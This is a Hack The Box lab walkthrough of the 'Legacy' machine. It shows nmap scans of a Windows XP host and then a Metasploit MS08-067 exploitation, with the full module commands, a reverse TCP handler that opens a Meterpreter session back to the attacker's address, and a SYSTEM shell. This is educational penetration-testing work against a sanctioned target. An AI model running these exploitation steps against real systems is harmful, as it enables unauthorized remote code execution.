Hack The Box: Legacy Walkthrough

By December 6, 2017 Walkthrough

Information About Our Target

  • Hostname: Legacy
  • IP Address: 10.10.10.4
  • Operating System Family: Windows

Abstract / Overview

This machine’s instance SMB is vulnerable to MS08-067 allowing for us to execute arbitrary code in a system context.

Information Gathering

Port Scan

1. Surface Scan

We begin with a quick scan of the top 1000 ports, leveraging only nmap’s banner grabbing script.

Output:


# Nmap 7.60 scan initiated Wed Dec 6 09:39:46 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.023s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp closed ms-wbt-server reset ttl 127

# Nmap done at Wed Dec 6 09:40:06 2017 -- 1 IP address (1 host up) scanned in 19.93 seconds

Hm, not much here. We see we have SMB available between TCP 139 and 445, and we have a closed remote desktop protocol (RDP) port (TCP 3389). Hints that we’re potentially facing a Windows system, as it’s much more common to find RDP running on a Windows machine than it is on Linux. Usually we’d find VNC on a *nix machine.

2. Deep Scan

Since we have an idea of what the host is running, we can now run a more thorough scan of the host, checking all TCP ports. This is going to take longer to run, but will give us significantly more information to work with.


# Nmap 7.60 scan initiated Wed Dec 6 09:40:06 2017 as: nmap -sS -T4 -sV -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 6 10:00:54 2017 -- 1 IP address (1 host up) scanned in 1248.59 seconds

Hm, we didn’t get all that much from this. No new ports, but we do know now that this is a Windows XP machine.

Services

So based on this we know a lot more about the host and it appears to be running:

  • Samba (TCP 139/445)

Exploitation

Since we know this is a Windows XP machine, we should try our hand at one of the most pervasive SMB vulnerabilities that ever hit Windows XP: MS08-067.

Details on this exploit: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Exploit itself: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi

So lets try this out


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf exploit(ms08_067_netapi) > set LPORT 443
LPORT => 443
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.5:443
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:443 -> 10.10.10.4:1029) at 2017-12-06 10:35:17 -0500
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1136 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>echo %username%
echo %username%
LEGACY$

Perfect! We’re now running as the SYSTEM machine account (machine account usernames are denoted by the $ at the end). We can now dump the user and root proofs!

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply